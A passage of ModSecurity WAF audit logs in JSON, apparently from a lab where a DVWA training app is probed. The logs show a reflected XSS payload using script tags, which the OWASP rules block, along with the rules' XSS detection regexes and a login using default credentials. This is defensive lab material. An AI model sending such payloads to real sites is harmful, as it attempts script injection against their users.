\"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcLuH8AAQEAAAkYuEUAAAAD\"]"],"stopwatch":{"p1":753,"p2":1699,"p3":73,"p4":379,"p5":78,"sr":46,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:10 --0400","transaction_id":"WRcQen8AAQEAAAkZ0AsAAAAE","remote_address":"192.168.75.130","remote_port":46192,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/?name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3B+alert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--+%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"316","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/xss_r/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)([<\\xef\\xbc\\x9c]script[^>\\xef\\xbc\\x9e]*[>\\xef\\xbc\\x9e][\\\\s\\\\S]*?)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT> found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)<[^\\\\w<>]*(?:[^<>\\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: </SCRIPT found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcQen8AAQEAAAkZ0AsAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcQen8AAQEAAAkZ0AsAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"(?i)([<\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9c]script[^>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e]*[>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e][\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT> found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcQen8AAQEAAAkZ0AsAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"(?i)<[^\\\\\\\\\\\\\\\\w<>]*(?:[^<>\\\\\\\\\"'\\\\\\\\\\\\\\\\s]*:)?[^\\\\\\\\\\\\\\\\w<>]*(?:\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?c\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?p\\\\\\\\\\\\\\\\W*?t|\\\\\\\\\\\\\\\\W*?f\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?m|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?t\\\\\\\\\\\\\\\\W*?y\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?e|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?v\\\\\\\\\\\\\\\\W*?g|\\\\\\\\\\\\\\\\W*?m\\\\\\\\\\\\\\\\W*?a\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?q\\\\\\\\\\\\\\\\W*?u\\\\\\\\\\\\\\\\W*?e\\\\\\\\\\\\\\\\W*?e|(?:\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?n\\\\\\\\\\\\\\\\W*?k|\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?b\\\\\\\\\\\\\\\\W*?j\\\\\\\\\\\\\\\\W*?e\\\\\\\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: </SCRIPT found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/ [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcQen8AAQEAAAkZ0AsAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcQen8AAQEAAAkZ0AsAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcQen8AAQEAAAkZ0AsAAAAE\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":1250,"p2":4155,"p3":0,"p4":0,"p5":163,"sr":30,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:14 --0400","transaction_id":"WRcQfn8AAQEAAAkZ0AwAAAAE","remote_address":"192.168.75.130","remote_port":46192,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"../../login.php","Content-Length":"0","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQfn8AAQEAAAkZ0AwAAAAE\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":549,"p2":2016,"p3":85,"p4":377,"p5":98,"sr":25,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:14 --0400","transaction_id":"WRcQfn8AAQEAAAkVV4MAAAAA","remote_address":"192.168.75.130","remote_port":46194,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"../../login.php","Content-Length":"0","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQfn8AAQEAAAkVV4MAAAAA\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":824,"p2":1965,"p3":92,"p4":176,"p5":93,"sr":34,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:14 --0400","transaction_id":"WRcQfn8AAQEAAAkVV4QAAAAA","remote_address":"192.168.75.130","remote_port":46194,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/login.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"698","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/login.php\"] [unique_id \"WRcQfn8AAQEAAAkVV4QAAAAA\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":886,"p2":2062,"p3":114,"p4":396,"p5":77,"sr":53,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:20 --0400","transaction_id":"WRcQhH8AAQEAAAmHBIwAAAAF","remote_address":"192.168.75.130","remote_port":46196,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/login.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/login.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"88"},"body":["username=admin&password=password&Login=Login&user_token=1bfc05000ee7ba4f5d2937d1b34b27be"]},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"index.php","Content-Length":"0","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file 